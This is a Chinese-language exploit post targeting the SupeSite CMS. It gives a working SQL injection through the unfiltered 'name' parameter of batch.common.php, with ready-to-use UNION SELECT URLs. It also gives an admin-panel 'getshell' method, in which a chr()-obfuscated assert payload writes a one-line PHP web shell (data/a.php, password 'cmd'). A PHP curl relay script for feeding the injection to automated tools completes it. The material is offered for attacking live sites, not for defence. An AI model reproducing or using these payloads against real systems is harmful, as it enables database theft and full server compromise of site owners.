SupeSite 通杀注射以及后台getshell

试了6.x 7.x 其他版本没测试, 大家自己测试下吧
[php]
batch.common.php (218) :
} elseif ($action == 'modelquote') {

//模型评论引用
$name = empty($_GET['name'])?'':trim($_GET['name']); //无过滤
$cid = empty($_GET['cid'])?0:intval($_GET['cid']);
$html = false;
if(!empty($name) && !empty($cid)) {
$item = array();
$query = $_SGLOBAL['db']->query('SELECT * FROM '.tname($name.'comments').' WHERE cid=\''.$cid.'\''); //tname处理 然后带入
if($item = $_SGLOBAL['db']->fetch_array($query)) {
$item['message'] = preg_replace("//is", '',$item['message']);
$html = '[quote]'.$blang['from_the_original_note'].$item['author'].$blang['at'].sgmdate($item['dateline']).$blang['released']."\n".cuthtml($item['message'], 100).'[/quote]';
showxml($html);
}
}
showxml($html);

}
[/php]
我们再看看tname函数
[php]
function/common.func.php (601) :
function tname($name, $mode=0) {
global $_SC;
if($mode == 1) {
return (empty($_SC['dbname_bbs'])?'':'`'.$_SC['dbname_bbs'].'`.').'`'.$_SC['tablepre_bbs'].$name.'`';
} elseif ($mode == 2) {
return (empty($_SC['dbname_uch'])?'':'`'.$_SC['dbname_uch'].'`.').'`'.$_SC['tablepre_uch'].$name.'`';
} else {
return $_SC['tablepre'].$name;
}
}[/php]

依然没过滤, 他都不管了你了 你还不注入吗?
exp:
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments [sql] #
这个后面可以直接order by了 你懂的
http://xxx//batch.common.php?action=modelquote&cid=1&name=spacecomments order by xxx #

由于版本不同, 所以字段数不一样, 建议先orderby判断下来, 比如7.5的, 就是21个字段, 直接丢个7.5的exp吧
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20select%201,2,3,4,5,concat(0x7e,user(),0x7e,0x5430304C5320474F21,0x7e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23

也可以配置好了,直接丢注入攻击跑
http://xxxxx/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2

关于SupeSite 7.5后台GETSHELL
新的拿shell方法, 和uchome的如出一辙

http://www.xxx.com/admincp.php?action=usrblocks&blocktype=&op=addblockcode
[php]
@assert(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(97).chr(115).chr(115).chr(101).chr(114).chr(116).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));
?>
[/php]
调用:http://www.xxx.com/batch.javascript.php?bid=1650 ,即在data下生成一句话木马a.php,密码为cmd

附上一个中转的脚本

<?php
set_time_limit(0); 
$id=$_GET["id"]; 
$id=str_replace(" ","%20",$id); 
$id=str_replace("=","%3D",$id); 

$url = "http://blog.0day5.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=$id%23"; //更改为你需要提交的地址

echo $url;

$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, "$url"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);

$output = curl_exec($ch); 
curl_close($ch); 
print_r($output);
?>

直接拿着工具就可以跑了

发表评论